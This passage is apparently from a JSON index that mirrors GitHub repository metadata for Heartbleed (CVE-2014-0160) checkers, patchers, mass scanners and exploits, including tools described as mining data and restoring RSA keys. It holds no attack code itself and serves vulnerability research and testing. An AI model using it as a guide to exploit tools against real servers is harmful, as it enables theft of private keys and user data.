mirror of
https://github.com/nomi-sec/PoC-in-GitHub.git
synced 2025-01-16 12:52:22 +01:00
1129 lines
No EOL
51 KiB
JSON
1129 lines
No EOL
51 KiB
JSON
[
|
||
{
|
||
"id": 18537678,
|
||
"name": "Heartbleed",
|
||
"full_name": "FiloSottile\/Heartbleed",
|
||
"owner": {
|
||
"login": "FiloSottile",
|
||
"id": 1225294,
|
||
"avatar_url": "https:\/\/avatars1.githubusercontent.com\/u\/1225294?v=4",
|
||
"html_url": "https:\/\/github.com\/FiloSottile"
|
||
},
|
||
"html_url": "https:\/\/github.com\/FiloSottile\/Heartbleed",
|
||
"description": "A checker (site and tool) for CVE-2014-0160",
|
||
"fork": false,
|
||
"created_at": "2014-04-07T23:03:09Z",
|
||
"updated_at": "2020-08-14T23:42:44Z",
|
||
"pushed_at": "2016-05-07T19:35:14Z",
|
||
"stargazers_count": 2243,
|
||
"watchers_count": 2243,
|
||
"forks_count": 482,
|
||
"forks": 482,
|
||
"watchers": 2243,
|
||
"score": 0
|
||
},
|
||
{
|
||
"id": 18545207,
|
||
"name": "heartbleeder",
|
||
"full_name": "titanous\/heartbleeder",
|
||
"owner": {
|
||
"login": "titanous",
|
||
"id": 13026,
|
||
"avatar_url": "https:\/\/avatars1.githubusercontent.com\/u\/13026?v=4",
|
||
"html_url": "https:\/\/github.com\/titanous"
|
||
},
|
||
"html_url": "https:\/\/github.com\/titanous\/heartbleeder",
|
||
"description": "OpenSSL CVE-2014-0160 Heartbleed vulnerability test",
|
||
"fork": false,
|
||
"created_at": "2014-04-08T04:25:23Z",
|
||
"updated_at": "2020-05-25T15:56:29Z",
|
||
"pushed_at": "2014-05-27T22:32:26Z",
|
||
"stargazers_count": 450,
|
||
"watchers_count": 450,
|
||
"forks_count": 97,
|
||
"forks": 97,
|
||
"watchers": 450,
|
||
"score": 0
|
||
},
|
||
{
|
||
"id": 18551813,
|
||
"name": "bleed",
|
||
"full_name": "DominikTo\/bleed",
|
||
"owner": {
|
||
"login": "DominikTo",
|
||
"id": 1384635,
|
||
"avatar_url": "https:\/\/avatars2.githubusercontent.com\/u\/1384635?v=4",
|
||
"html_url": "https:\/\/github.com\/DominikTo"
|
||
},
|
||
"html_url": "https:\/\/github.com\/DominikTo\/bleed",
|
||
"description": "bleed is a tool to test servers for the 'Heartbleed' vulnerability (CVE-2014-0160).",
|
||
"fork": false,
|
||
"created_at": "2014-04-08T09:03:01Z",
|
||
"updated_at": "2018-10-05T15:36:14Z",
|
||
"pushed_at": "2014-04-17T13:29:34Z",
|
||
"stargazers_count": 7,
|
||
"watchers_count": 7,
|
||
"forks_count": 0,
|
||
"forks": 0,
|
||
"watchers": 7,
|
||
"score": 0
|
||
},
|
||
{
|
||
"id": 18551976,
|
||
"name": "heartthreader",
|
||
"full_name": "cyphar\/heartthreader",
|
||
"owner": {
|
||
"login": "cyphar",
|
||
"id": 2888411,
|
||
"avatar_url": "https:\/\/avatars1.githubusercontent.com\/u\/2888411?v=4",
|
||
"html_url": "https:\/\/github.com\/cyphar"
|
||
},
|
||
"html_url": "https:\/\/github.com\/cyphar\/heartthreader",
|
||
"description": "Mass, multithreaded testing for servers against Heartbleed (CVE-2014-0160).",
|
||
"fork": false,
|
||
"created_at": "2014-04-08T09:08:52Z",
|
||
"updated_at": "2019-01-09T02:36:04Z",
|
||
"pushed_at": "2014-05-29T11:38:13Z",
|
||
"stargazers_count": 2,
|
||
"watchers_count": 2,
|
||
"forks_count": 2,
|
||
"forks": 2,
|
||
"watchers": 2,
|
||
"score": 0
|
||
},
|
||
{
|
||
"id": 18552299,
|
||
"name": "patch-openssl-CVE-2014-0160",
|
||
"full_name": "jdauphant\/patch-openssl-CVE-2014-0160",
|
||
"owner": {
|
||
"login": "jdauphant",
|
||
"id": 1238254,
|
||
"avatar_url": "https:\/\/avatars0.githubusercontent.com\/u\/1238254?v=4",
|
||
"html_url": "https:\/\/github.com\/jdauphant"
|
||
},
|
||
"html_url": "https:\/\/github.com\/jdauphant\/patch-openssl-CVE-2014-0160",
|
||
"description": "Patch openssl #heartbleed with ansible ",
|
||
"fork": false,
|
||
"created_at": "2014-04-08T09:19:49Z",
|
||
"updated_at": "2019-02-26T03:45:46Z",
|
||
"pushed_at": "2014-12-02T12:20:51Z",
|
||
"stargazers_count": 18,
|
||
"watchers_count": 18,
|
||
"forks_count": 8,
|
||
"forks": 8,
|
||
"watchers": 18,
|
||
"score": 0
|
||
},
|
||
{
|
||
"id": 18553786,
|
||
"name": "heartbleed-masstest",
|
||
"full_name": "musalbas\/heartbleed-masstest",
|
||
"owner": {
|
||
"login": "musalbas",
|
||
"id": 5038597,
|
||
"avatar_url": "https:\/\/avatars2.githubusercontent.com\/u\/5038597?v=4",
|
||
"html_url": "https:\/\/github.com\/musalbas"
|
||
},
|
||
"html_url": "https:\/\/github.com\/musalbas\/heartbleed-masstest",
|
||
"description": "Multi-threaded tool for scanning many hosts for CVE-2014-0160.",
|
||
"fork": false,
|
||
"created_at": "2014-04-08T10:10:43Z",
|
||
"updated_at": "2020-08-14T04:06:17Z",
|
||
"pushed_at": "2015-07-02T14:47:31Z",
|
||
"stargazers_count": 572,
|
||
"watchers_count": 572,
|
||
"forks_count": 233,
|
||
"forks": 233,
|
||
"watchers": 572,
|
||
"score": 0
|
||
},
|
||
{
|
||
"id": 18561166,
|
||
"name": "CVE-2014-0160-Scanner",
|
||
"full_name": "obayesshelton\/CVE-2014-0160-Scanner",
|
||
"owner": {
|
||
"login": "obayesshelton",
|
||
"id": 628720,
|
||
"avatar_url": "https:\/\/avatars2.githubusercontent.com\/u\/628720?v=4",
|
||
"html_url": "https:\/\/github.com\/obayesshelton"
|
||
},
|
||
"html_url": "https:\/\/github.com\/obayesshelton\/CVE-2014-0160-Scanner",
|
||
"description": null,
|
||
"fork": false,
|
||
"created_at": "2014-04-08T14:22:36Z",
|
||
"updated_at": "2014-04-10T14:04:12Z",
|
||
"pushed_at": "2014-04-10T14:04:12Z",
|
||
"stargazers_count": 0,
|
||
"watchers_count": 0,
|
||
"forks_count": 0,
|
||
"forks": 0,
|
||
"watchers": 0,
|
||
"score": 0
|
||
},
|
||
{
|
||
"id": 18566360,
|
||
"name": "pacemaker",
|
||
"full_name": "Lekensteyn\/pacemaker",
|
||
"owner": {
|
||
"login": "Lekensteyn",
|
||
"id": 164530,
|
||
"avatar_url": "https:\/\/avatars0.githubusercontent.com\/u\/164530?v=4",
|
||
"html_url": "https:\/\/github.com\/Lekensteyn"
|
||
},
|
||
"html_url": "https:\/\/github.com\/Lekensteyn\/pacemaker",
|
||
"description": "Heartbleed (CVE-2014-0160) client exploit",
|
||
"fork": false,
|
||
"created_at": "2014-04-08T16:41:51Z",
|
||
"updated_at": "2020-06-17T03:23:13Z",
|
||
"pushed_at": "2016-01-22T00:42:35Z",
|
||
"stargazers_count": 309,
|
||
"watchers_count": 309,
|
||
"forks_count": 82,
|
||
"forks": 82,
|
||
"watchers": 309,
|
||
"score": 0
|
||
},
|
||
{
|
||
"id": 18574769,
|
||
"name": "openmagic",
|
||
"full_name": "isgroup-srl\/openmagic",
|
||
"owner": {
|
||
"login": "isgroup-srl",
|
||
"id": 3922436,
|
||
"avatar_url": "https:\/\/avatars2.githubusercontent.com\/u\/3922436?v=4",
|
||
"html_url": "https:\/\/github.com\/isgroup-srl"
|
||
},
|
||
"html_url": "https:\/\/github.com\/isgroup-srl\/openmagic",
|
||
"description": "OpenSSL TLS heartbeat read overrun (CVE-2014-0160)",
|
||
"fork": false,
|
||
"created_at": "2014-04-08T20:58:26Z",
|
||
"updated_at": "2019-10-02T13:26:04Z",
|
||
"pushed_at": "2014-04-11T02:40:46Z",
|
||
"stargazers_count": 38,
|
||
"watchers_count": 38,
|
||
"forks_count": 9,
|
||
"forks": 9,
|
||
"watchers": 38,
|
||
"score": 0
|
||
},
|
||
{
|
||
"id": 18577198,
|
||
"name": "CVE-2014-0160",
|
||
"full_name": "fb1h2s\/CVE-2014-0160",
|
||
"owner": {
|
||
"login": "fb1h2s",
|
||
"id": 2658510,
|
||
"avatar_url": "https:\/\/avatars1.githubusercontent.com\/u\/2658510?v=4",
|
||
"html_url": "https:\/\/github.com\/fb1h2s"
|
||
},
|
||
"html_url": "https:\/\/github.com\/fb1h2s\/CVE-2014-0160",
|
||
"description": "openssl Heart Bleed Exploit: CVE-2014-0160 Mass Security Auditor",
|
||
"fork": false,
|
||
"created_at": "2014-04-08T22:29:55Z",
|
||
"updated_at": "2014-04-08T22:29:55Z",
|
||
"pushed_at": "2014-04-08T22:29:55Z",
|
||
"stargazers_count": 0,
|
||
"watchers_count": 0,
|
||
"forks_count": 0,
|
||
"forks": 0,
|
||
"watchers": 0,
|
||
"score": 0
|
||
},
|
||
{
|
||
"id": 18580081,
|
||
"name": "heartbleedchecker-chrome",
|
||
"full_name": "roganartu\/heartbleedchecker-chrome",
|
||
"owner": {
|
||
"login": "roganartu",
|
||
"id": 1133705,
|
||
"avatar_url": "https:\/\/avatars1.githubusercontent.com\/u\/1133705?v=4",
|
||
"html_url": "https:\/\/github.com\/roganartu"
|
||
},
|
||
"html_url": "https:\/\/github.com\/roganartu\/heartbleedchecker-chrome",
|
||
"description": "Chrome extension that automatically checks visited sites for vulnerability to OpenSSL CVE-2014-0160",
|
||
"fork": false,
|
||
"created_at": "2014-04-09T00:41:04Z",
|
||
"updated_at": "2014-04-09T01:05:21Z",
|
||
"pushed_at": "2014-04-09T01:05:20Z",
|
||
"stargazers_count": 0,
|
||
"watchers_count": 0,
|
||
"forks_count": 0,
|
||
"forks": 0,
|
||
"watchers": 0,
|
||
"score": 0
|
||
},
|
||
{
|
||
"id": 18586339,
|
||
"name": "heartbleed",
|
||
"full_name": "zouguangxian\/heartbleed",
|
||
"owner": {
|
||
"login": "zouguangxian",
|
||
"id": 863281,
|
||
"avatar_url": "https:\/\/avatars2.githubusercontent.com\/u\/863281?v=4",
|
||
"html_url": "https:\/\/github.com\/zouguangxian"
|
||
},
|
||
"html_url": "https:\/\/github.com\/zouguangxian\/heartbleed",
|
||
"description": "Checks for vulnerabilities: CVE-2014-0160 ",
|
||
"fork": false,
|
||
"created_at": "2014-04-09T05:29:36Z",
|
||
"updated_at": "2014-04-10T01:49:59Z",
|
||
"pushed_at": "2014-04-10T01:49:59Z",
|
||
"stargazers_count": 1,
|
||
"watchers_count": 1,
|
||
"forks_count": 2,
|
||
"forks": 2,
|
||
"watchers": 1,
|
||
"score": 0
|
||
},
|
||
{
|
||
"id": 18603489,
|
||
"name": "heartbleed-poc",
|
||
"full_name": "sensepost\/heartbleed-poc",
|
||
"owner": {
|
||
"login": "sensepost",
|
||
"id": 1193973,
|
||
"avatar_url": "https:\/\/avatars2.githubusercontent.com\/u\/1193973?v=4",
|
||
"html_url": "https:\/\/github.com\/sensepost"
|
||
},
|
||
"html_url": "https:\/\/github.com\/sensepost\/heartbleed-poc",
|
||
"description": "Test for SSL heartbeat vulnerability (CVE-2014-0160)",
|
||
"fork": false,
|
||
"created_at": "2014-04-09T15:59:14Z",
|
||
"updated_at": "2020-08-05T12:48:52Z",
|
||
"pushed_at": "2014-07-10T21:17:22Z",
|
||
"stargazers_count": 122,
|
||
"watchers_count": 122,
|
||
"forks_count": 72,
|
||
"forks": 72,
|
||
"watchers": 122,
|
||
"score": 0
|
||
},
|
||
{
|
||
"id": 18613807,
|
||
"name": "heartbleed-extention",
|
||
"full_name": "proactiveRISK\/heartbleed-extention",
|
||
"owner": {
|
||
"login": "proactiveRISK",
|
||
"id": 7243071,
|
||
"avatar_url": "https:\/\/avatars2.githubusercontent.com\/u\/7243071?v=4",
|
||
"html_url": "https:\/\/github.com\/proactiveRISK"
|
||
},
|
||
"html_url": "https:\/\/github.com\/proactiveRISK\/heartbleed-extention",
|
||
"description": "A firefox extension and checker for CVE-2014-0160",
|
||
"fork": false,
|
||
"created_at": "2014-04-09T21:20:56Z",
|
||
"updated_at": "2015-03-07T23:34:52Z",
|
||
"pushed_at": "2014-04-11T15:34:20Z",
|
||
"stargazers_count": 1,
|
||
"watchers_count": 1,
|
||
"forks_count": 1,
|
||
"forks": 1,
|
||
"watchers": 1,
|
||
"score": 0
|
||
},
|
||
{
|
||
"id": 18621109,
|
||
"name": "coronary",
|
||
"full_name": "amerine\/coronary",
|
||
"owner": {
|
||
"login": "amerine",
|
||
"id": 1016,
|
||
"avatar_url": "https:\/\/avatars2.githubusercontent.com\/u\/1016?v=4",
|
||
"html_url": "https:\/\/github.com\/amerine"
|
||
},
|
||
"html_url": "https:\/\/github.com\/amerine\/coronary",
|
||
"description": "Test CIDR blocks for CVE-2014-0160\/Heartbleed",
|
||
"fork": false,
|
||
"created_at": "2014-04-10T02:28:05Z",
|
||
"updated_at": "2014-04-10T02:41:44Z",
|
||
"pushed_at": "2014-04-10T02:41:44Z",
|
||
"stargazers_count": 0,
|
||
"watchers_count": 0,
|
||
"forks_count": 1,
|
||
"forks": 1,
|
||
"watchers": 0,
|
||
"score": 0
|
||
},
|
||
{
|
||
"id": 18621604,
|
||
"name": "CVE-2014-0160",
|
||
"full_name": "0x90\/CVE-2014-0160",
|
||
"owner": {
|
||
"login": "0x90",
|
||
"id": 806042,
|
||
"avatar_url": "https:\/\/avatars2.githubusercontent.com\/u\/806042?v=4",
|
||
"html_url": "https:\/\/github.com\/0x90"
|
||
},
|
||
"html_url": "https:\/\/github.com\/0x90\/CVE-2014-0160",
|
||
"description": "Heartbleed variants",
|
||
"fork": false,
|
||
"created_at": "2014-04-10T02:47:43Z",
|
||
"updated_at": "2019-05-15T09:18:49Z",
|
||
"pushed_at": "2014-05-09T15:51:53Z",
|
||
"stargazers_count": 6,
|
||
"watchers_count": 6,
|
||
"forks_count": 11,
|
||
"forks": 11,
|
||
"watchers": 6,
|
||
"score": 0
|
||
},
|
||
{
|
||
"id": 18623918,
|
||
"name": "CVE-2014-0160",
|
||
"full_name": "ice-security88\/CVE-2014-0160",
|
||
"owner": {
|
||
"login": "ice-security88",
|
||
"id": 7246782,
|
||
"avatar_url": "https:\/\/avatars1.githubusercontent.com\/u\/7246782?v=4",
|
||
"html_url": "https:\/\/github.com\/ice-security88"
|
||
},
|
||
"html_url": "https:\/\/github.com\/ice-security88\/CVE-2014-0160",
|
||
"description": null,
|
||
"fork": false,
|
||
"created_at": "2014-04-10T04:27:10Z",
|
||
"updated_at": "2014-04-10T04:27:10Z",
|
||
"pushed_at": "2014-04-10T04:27:10Z",
|
||
"stargazers_count": 0,
|
||
"watchers_count": 0,
|
||
"forks_count": 0,
|
||
"forks": 0,
|
||
"watchers": 0,
|
||
"score": 0
|
||
},
|
||
{
|
||
"id": 18634299,
|
||
"name": "HeartBleed-Vulnerability-Checker",
|
||
"full_name": "waqasjamal-zz\/HeartBleed-Vulnerability-Checker",
|
||
"owner": {
|
||
"login": "waqasjamal-zz",
|
||
"id": 2502430,
|
||
"avatar_url": "https:\/\/avatars2.githubusercontent.com\/u\/2502430?v=4",
|
||
"html_url": "https:\/\/github.com\/waqasjamal-zz"
|
||
},
|
||
"html_url": "https:\/\/github.com\/waqasjamal-zz\/HeartBleed-Vulnerability-Checker",
|
||
"description": "This repo contains a script to automatically test sites for vulnerability to the Heartbleed Bug (CVE-2014-0160) based on the input file for the urls.",
|
||
"fork": false,
|
||
"created_at": "2014-04-10T11:42:33Z",
|
||
"updated_at": "2014-04-11T11:41:14Z",
|
||
"pushed_at": "2014-04-11T11:41:17Z",
|
||
"stargazers_count": 1,
|
||
"watchers_count": 1,
|
||
"forks_count": 1,
|
||
"forks": 1,
|
||
"watchers": 1,
|
||
"score": 0
|
||
},
|
||
{
|
||
"id": 18644790,
|
||
"name": "knockbleed",
|
||
"full_name": "siddolo\/knockbleed",
|
||
"owner": {
|
||
"login": "siddolo",
|
||
"id": 2439981,
|
||
"avatar_url": "https:\/\/avatars0.githubusercontent.com\/u\/2439981?v=4",
|
||
"html_url": "https:\/\/github.com\/siddolo"
|
||
},
|
||
"html_url": "https:\/\/github.com\/siddolo\/knockbleed",
|
||
"description": "CVE-2014-0160 mass test against subdomains",
|
||
"fork": false,
|
||
"created_at": "2014-04-10T17:12:53Z",
|
||
"updated_at": "2014-04-10T17:48:36Z",
|
||
"pushed_at": "2014-04-10T17:48:39Z",
|
||
"stargazers_count": 0,
|
||
"watchers_count": 0,
|
||
"forks_count": 0,
|
||
"forks": 0,
|
||
"watchers": 0,
|
||
"score": 0
|
||
},
|
||
{
|
||
"id": 18649488,
|
||
"name": "openssl-heartbleed-fix",
|
||
"full_name": "sammyfung\/openssl-heartbleed-fix",
|
||
"owner": {
|
||
"login": "sammyfung",
|
||
"id": 50470,
|
||
"avatar_url": "https:\/\/avatars2.githubusercontent.com\/u\/50470?v=4",
|
||
"html_url": "https:\/\/github.com\/sammyfung"
|
||
},
|
||
"html_url": "https:\/\/github.com\/sammyfung\/openssl-heartbleed-fix",
|
||
"description": "OpenSSL Heartbleed (CVE-2014-0160) Fix script",
|
||
"fork": false,
|
||
"created_at": "2014-04-10T19:47:42Z",
|
||
"updated_at": "2014-06-11T14:34:33Z",
|
||
"pushed_at": "2014-04-10T20:11:58Z",
|
||
"stargazers_count": 1,
|
||
"watchers_count": 1,
|
||
"forks_count": 0,
|
||
"forks": 0,
|
||
"watchers": 1,
|
||
"score": 0
|
||
},
|
||
{
|
||
"id": 18676804,
|
||
"name": "heartbleed-test",
|
||
"full_name": "a0726h77\/heartbleed-test",
|
||
"owner": {
|
||
"login": "a0726h77",
|
||
"id": 127018,
|
||
"avatar_url": "https:\/\/avatars2.githubusercontent.com\/u\/127018?v=4",
|
||
"html_url": "https:\/\/github.com\/a0726h77"
|
||
},
|
||
"html_url": "https:\/\/github.com\/a0726h77\/heartbleed-test",
|
||
"description": "CVE-2014-0160 scanner",
|
||
"fork": false,
|
||
"created_at": "2014-04-11T14:24:54Z",
|
||
"updated_at": "2014-04-12T13:29:50Z",
|
||
"pushed_at": "2014-04-12T13:29:53Z",
|
||
"stargazers_count": 0,
|
||
"watchers_count": 0,
|
||
"forks_count": 0,
|
||
"forks": 0,
|
||
"watchers": 0,
|
||
"score": 0
|
||
},
|
||
{
|
||
"id": 18705580,
|
||
"name": "heartbleed-dtls",
|
||
"full_name": "hreese\/heartbleed-dtls",
|
||
"owner": {
|
||
"login": "hreese",
|
||
"id": 892400,
|
||
"avatar_url": "https:\/\/avatars2.githubusercontent.com\/u\/892400?v=4",
|
||
"html_url": "https:\/\/github.com\/hreese"
|
||
},
|
||
"html_url": "https:\/\/github.com\/hreese\/heartbleed-dtls",
|
||
"description": "POC for CVE-2014-0160 (Heartbleed) for DTLS",
|
||
"fork": false,
|
||
"created_at": "2014-04-12T14:13:36Z",
|
||
"updated_at": "2019-08-13T15:39:32Z",
|
||
"pushed_at": "2016-03-26T12:21:03Z",
|
||
"stargazers_count": 6,
|
||
"watchers_count": 6,
|
||
"forks_count": 0,
|
||
"forks": 0,
|
||
"watchers": 6,
|
||
"score": 0
|
||
},
|
||
{
|
||
"id": 18714630,
|
||
"name": "bleeding_onions",
|
||
"full_name": "wwwiretap\/bleeding_onions",
|
||
"owner": {
|
||
"login": "wwwiretap",
|
||
"id": 210109,
|
||
"avatar_url": "https:\/\/avatars0.githubusercontent.com\/u\/210109?v=4",
|
||
"html_url": "https:\/\/github.com\/wwwiretap"
|
||
},
|
||
"html_url": "https:\/\/github.com\/wwwiretap\/bleeding_onions",
|
||
"description": "Script to find Exit and Guard nodes in the Tor Network, that are still suffering from CVE-2014-0160",
|
||
"fork": false,
|
||
"created_at": "2014-04-12T21:04:55Z",
|
||
"updated_at": "2014-09-09T17:32:17Z",
|
||
"pushed_at": "2014-04-13T14:57:20Z",
|
||
"stargazers_count": 6,
|
||
"watchers_count": 6,
|
||
"forks_count": 0,
|
||
"forks": 0,
|
||
"watchers": 6,
|
||
"score": 0
|
||
},
|
||
{
|
||
"id": 18722665,
|
||
"name": "heatbleeding",
|
||
"full_name": "idkqh7\/heatbleeding",
|
||
"owner": {
|
||
"login": "idkqh7",
|
||
"id": 2221840,
|
||
"avatar_url": "https:\/\/avatars2.githubusercontent.com\/u\/2221840?v=4",
|
||
"html_url": "https:\/\/github.com\/idkqh7"
|
||
},
|
||
"html_url": "https:\/\/github.com\/idkqh7\/heatbleeding",
|
||
"description": "Test script for test 1Password database for SSL Hea(r)t Bleeding (CVE-2014-0160)",
|
||
"fork": false,
|
||
"created_at": "2014-04-13T05:52:43Z",
|
||
"updated_at": "2018-03-04T07:22:19Z",
|
||
"pushed_at": "2014-04-09T16:36:52Z",
|
||
"stargazers_count": 0,
|
||
"watchers_count": 0,
|
||
"forks_count": 0,
|
||
"forks": 0,
|
||
"watchers": 0,
|
||
"score": 0
|
||
},
|
||
{
|
||
"id": 18728436,
|
||
"name": "ssl-heartbleed.nse",
|
||
"full_name": "GeeksXtreme\/ssl-heartbleed.nse",
|
||
"owner": {
|
||
"login": "GeeksXtreme",
|
||
"id": 5917335,
|
||
"avatar_url": "https:\/\/avatars2.githubusercontent.com\/u\/5917335?v=4",
|
||
"html_url": "https:\/\/github.com\/GeeksXtreme"
|
||
},
|
||
"html_url": "https:\/\/github.com\/GeeksXtreme\/ssl-heartbleed.nse",
|
||
"description": "Nmap NSE script that discovers\/exploits Heartbleed\/CVE-2014-0160.",
|
||
"fork": false,
|
||
"created_at": "2014-04-13T12:14:29Z",
|
||
"updated_at": "2020-04-07T08:00:25Z",
|
||
"pushed_at": "2014-04-13T11:10:34Z",
|
||
"stargazers_count": 1,
|
||
"watchers_count": 1,
|
||
"forks_count": 4,
|
||
"forks": 4,
|
||
"watchers": 1,
|
||
"score": 0
|
||
},
|
||
{
|
||
"id": 18737537,
|
||
"name": "heartbleed",
|
||
"full_name": "xlucas\/heartbleed",
|
||
"owner": {
|
||
"login": "xlucas",
|
||
"id": 2470398,
|
||
"avatar_url": "https:\/\/avatars1.githubusercontent.com\/u\/2470398?v=4",
|
||
"html_url": "https:\/\/github.com\/xlucas"
|
||
},
|
||
"html_url": "https:\/\/github.com\/xlucas\/heartbleed",
|
||
"description": "A research tool designed to check for OpenSSL CVE-2014-0160 vulnerability",
|
||
"fork": false,
|
||
"created_at": "2014-04-13T19:18:32Z",
|
||
"updated_at": "2018-10-07T00:48:31Z",
|
||
"pushed_at": "2015-05-02T08:25:20Z",
|
||
"stargazers_count": 1,
|
||
"watchers_count": 1,
|
||
"forks_count": 0,
|
||
"forks": 0,
|
||
"watchers": 1,
|
||
"score": 0
|
||
},
|
||
{
|
||
"id": 18794584,
|
||
"name": "-Heartbleed-",
|
||
"full_name": "indiw0rm\/-Heartbleed-",
|
||
"owner": {
|
||
"login": "indiw0rm",
|
||
"id": 7300510,
|
||
"avatar_url": "https:\/\/avatars1.githubusercontent.com\/u\/7300510?v=4",
|
||
"html_url": "https:\/\/github.com\/indiw0rm"
|
||
},
|
||
"html_url": "https:\/\/github.com\/indiw0rm\/-Heartbleed-",
|
||
"description": "A checker (site and tool) for CVE-2014-0160: ",
|
||
"fork": false,
|
||
"created_at": "2014-04-15T09:30:40Z",
|
||
"updated_at": "2014-04-15T09:30:40Z",
|
||
"pushed_at": "2014-04-15T09:30:40Z",
|
||
"stargazers_count": 0,
|
||
"watchers_count": 0,
|
||
"forks_count": 0,
|
||
"forks": 0,
|
||
"watchers": 0,
|
||
"score": 0
|
||
},
|
||
{
|
||
"id": 18802435,
|
||
"name": "heartbleed-tools",
|
||
"full_name": "einaros\/heartbleed-tools",
|
||
"owner": {
|
||
"login": "einaros",
|
||
"id": 394360,
|
||
"avatar_url": "https:\/\/avatars1.githubusercontent.com\/u\/394360?v=4",
|
||
"html_url": "https:\/\/github.com\/einaros"
|
||
},
|
||
"html_url": "https:\/\/github.com\/einaros\/heartbleed-tools",
|
||
"description": "OpenSSL Heartbleed (CVE-2014-0160) vulnerability scanner, data miner and RSA key-restore tools.",
|
||
"fork": false,
|
||
"created_at": "2014-04-15T14:09:54Z",
|
||
"updated_at": "2020-03-30T21:42:41Z",
|
||
"pushed_at": "2014-06-18T11:54:32Z",
|
||
"stargazers_count": 91,
|
||
"watchers_count": 91,
|
||
"forks_count": 19,
|
||
"forks": 19,
|
||
"watchers": 91,
|
||
"score": 0
|
||
},
|
||
{
|
||
"id": 18818122,
|
||
"name": "Heartbleed",
|
||
"full_name": "mozilla-services\/Heartbleed",
|
||
"owner": {
|
||
"login": "mozilla-services",
|
||
"id": 1066228,
|
||
"avatar_url": "https:\/\/avatars1.githubusercontent.com\/u\/1066228?v=4",
|
||
"html_url": "https:\/\/github.com\/mozilla-services"
|
||
},
|
||
"html_url": "https:\/\/github.com\/mozilla-services\/Heartbleed",
|
||
"description": "A checker (site and tool) for CVE-2014-0160",
|
||
"fork": false,
|
||
"created_at": "2014-04-15T22:22:18Z",
|
||
"updated_at": "2019-05-30T01:17:07Z",
|
||
"pushed_at": "2019-03-27T19:51:32Z",
|
||
"stargazers_count": 3,
|
||
"watchers_count": 3,
|
||
"forks_count": 4,
|
||
"forks": 4,
|
||
"watchers": 3,
|
||
"score": 0
|
||
},
|
||
{
|
||
"id": 18935164,
|
||
"name": "heartbleed.js",
|
||
"full_name": "yryz\/heartbleed.js",
|
||
"owner": {
|
||
"login": "yryz",
|
||
"id": 1646732,
|
||
"avatar_url": "https:\/\/avatars3.githubusercontent.com\/u\/1646732?v=4",
|
||
"html_url": "https:\/\/github.com\/yryz"
|
||
},
|
||
"html_url": "https:\/\/github.com\/yryz\/heartbleed.js",
|
||
"description": "openssl Heartbleed bug(CVE-2014-0160) check for Node.js ",
|
||
"fork": false,
|
||
"created_at": "2014-04-19T06:20:44Z",
|
||
"updated_at": "2018-07-12T01:37:36Z",
|
||
"pushed_at": "2015-04-30T09:25:33Z",
|
||
"stargazers_count": 5,
|
||
"watchers_count": 5,
|
||
"forks_count": 1,
|
||
"forks": 1,
|
||
"watchers": 5,
|
||
"score": 0
|
||
},
|
||
{
|
||
"id": 19339521,
|
||
"name": "MaltegoHeartbleed",
|
||
"full_name": "DisK0nn3cT\/MaltegoHeartbleed",
|
||
"owner": {
|
||
"login": "DisK0nn3cT",
|
||
"id": 727064,
|
||
"avatar_url": "https:\/\/avatars0.githubusercontent.com\/u\/727064?v=4",
|
||
"html_url": "https:\/\/github.com\/DisK0nn3cT"
|
||
},
|
||
"html_url": "https:\/\/github.com\/DisK0nn3cT\/MaltegoHeartbleed",
|
||
"description": "Maltego transform to detect the OpenSSL Heartbleed vulnerability (CVE-2014-0160)",
|
||
"fork": false,
|
||
"created_at": "2014-05-01T08:28:45Z",
|
||
"updated_at": "2020-07-12T14:14:24Z",
|
||
"pushed_at": "2014-05-01T08:47:16Z",
|
||
"stargazers_count": 15,
|
||
"watchers_count": 15,
|
||
"forks_count": 7,
|
||
"forks": 7,
|
||
"watchers": 15,
|
||
"score": 0
|
||
},
|
||
{
|
||
"id": 19408970,
|
||
"name": "HeartLeak",
|
||
"full_name": "OffensivePython\/HeartLeak",
|
||
"owner": {
|
||
"login": "OffensivePython",
|
||
"id": 6576532,
|
||
"avatar_url": "https:\/\/avatars3.githubusercontent.com\/u\/6576532?v=4",
|
||
"html_url": "https:\/\/github.com\/OffensivePython"
|
||
},
|
||
"html_url": "https:\/\/github.com\/OffensivePython\/HeartLeak",
|
||
"description": "CVE-2014-0160 (Heartbeat Buffer over-read bug)",
|
||
"fork": false,
|
||
"created_at": "2014-05-03T18:08:27Z",
|
||
"updated_at": "2020-04-05T15:18:34Z",
|
||
"pushed_at": "2014-05-03T18:14:49Z",
|
||
"stargazers_count": 16,
|
||
"watchers_count": 16,
|
||
"forks_count": 10,
|
||
"forks": 10,
|
||
"watchers": 16,
|
||
"score": 0
|
||
},
|
||
{
|
||
"id": 25109038,
|
||
"name": "ssl_scanner",
|
||
"full_name": "vortextube\/ssl_scanner",
|
||
"owner": {
|
||
"login": "vortextube",
|
||
"id": 7092728,
|
||
"avatar_url": "https:\/\/avatars2.githubusercontent.com\/u\/7092728?v=4",
|
||
"html_url": "https:\/\/github.com\/vortextube"
|
||
},
|
||
"html_url": "https:\/\/github.com\/vortextube\/ssl_scanner",
|
||
"description": "Heartbleed (CVE-2014-0160) SSLv3 Scanner",
|
||
"fork": false,
|
||
"created_at": "2014-10-12T05:13:06Z",
|
||
"updated_at": "2017-01-18T17:52:53Z",
|
||
"pushed_at": "2014-10-12T05:22:07Z",
|
||
"stargazers_count": 1,
|
||
"watchers_count": 1,
|
||
"forks_count": 1,
|
||
"forks": 1,
|
||
"watchers": 1,
|
||
"score": 0
|
||
},
|
||
{
|
||
"id": 31863201,
|
||
"name": "heartbleed-PoC",
|
||
"full_name": "mpgn\/heartbleed-PoC",
|
||
"owner": {
|
||
"login": "mpgn",
|
||
"id": 5891788,
|
||
"avatar_url": "https:\/\/avatars2.githubusercontent.com\/u\/5891788?v=4",
|
||
"html_url": "https:\/\/github.com\/mpgn"
|
||
},
|
||
"html_url": "https:\/\/github.com\/mpgn\/heartbleed-PoC",
|
||
"description": ":broken_heart: Hearbleed exploit to retrieve sensitive information CVE-2014-0160 :broken_heart:",
|
||
"fork": false,
|
||
"created_at": "2015-03-08T19:54:33Z",
|
||
"updated_at": "2020-07-26T15:49:32Z",
|
||
"pushed_at": "2015-03-15T17:18:56Z",
|
||
"stargazers_count": 47,
|
||
"watchers_count": 47,
|
||
"forks_count": 33,
|
||
"forks": 33,
|
||
"watchers": 47,
|
||
"score": 0
|
||
},
|
||
{
|
||
"id": 33456758,
|
||
"name": "heartbleed.py",
|
||
"full_name": "xanas\/heartbleed.py",
|
||
"owner": {
|
||
"login": "xanas",
|
||
"id": 11810462,
|
||
"avatar_url": "https:\/\/avatars2.githubusercontent.com\/u\/11810462?v=4",
|
||
